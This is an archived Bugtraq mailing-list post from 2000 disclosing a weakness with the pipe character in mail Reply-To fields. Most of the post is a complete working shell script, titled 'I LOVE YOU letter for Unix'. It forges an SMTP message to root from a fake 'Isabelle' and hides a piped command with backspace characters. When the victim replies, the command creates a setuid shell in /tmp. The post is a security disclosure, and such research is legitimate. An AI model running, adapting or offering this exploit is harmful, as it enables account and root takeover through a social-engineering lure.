[17509] in bugtraq
mail Reply-To field exploit
daemon@ATHENA.MIT.EDU (gregory duchemin)
Mon Nov 6 02:59:24 2000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id: <F282z4r02V5xm4iZrbU00009213@hotmail.com>
Date: Sun, 5 Nov 2000 21:56:17 GMT
Reply-To: gregory duchemin <c3rb3r@HOTMAIL.COM>
From: gregory duchemin <c3rb3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
hi all,
because there are few people here that didn't seem to understand how
serious is the mail.local/mail/sendmail weakness i reported to bugtraq
few days ago (lack of imagination ? )
here is an exploit, not technicaly impressive but just enough powerfull to
deceive many people around here and take over their account priviledge.
I persist to claim that no | char should be allowed in any smtp/lmtp/mime
fields
(even in contradiction with any rfc) because of the major security
vulnerability it introduce.
Note: It's NOT A BUG in mail, sendmail or mail.local but a weakness caused
by a bindly
rfc compliance.
I didn't try elm, mailx and others so feedback are welcomed
payback here is victim account take over by spawning a setuid shell
in /tmp. (even root)
Solution: take care about the reply-to recipient real anatomy. :)
Cheers,
Gregory Duchemin
I LOVE YOU letter for Unix
==========================
#!/bin/sh
#
# I-Love-U.sh
# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
#
# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
#
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r@hotmail.com
# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
#
cd /tmp
cat ^H^H^H^H^Hsabelle@hotmail.com << _End
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
_End
{
sleep 1
echo "HELO hotmail.com"
sleep 1
echo "MAIL FROM:<Isabelle@hotmail.com>"
sleep 1
echo "RCPT TO:<root>"
sleep 1
echo "DATA"
sleep 1
# Reply-to will appear as Reply-To:<|sabelle@hotmail.com>
echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle@hotmail.com>"
sleep 1
echo
echo "I saw you yesterday, since i'm a bit confused..i just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
echo
echo "Isabelle."
echo "."
sleep 1
echo "QUIT"
sleep 2
}|telnet localhost 25
echo "Job is done...now check for newsh in /tmp"
echo
echo
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Share information about yourself, create your own public profile at
http://profiles.msn.com.
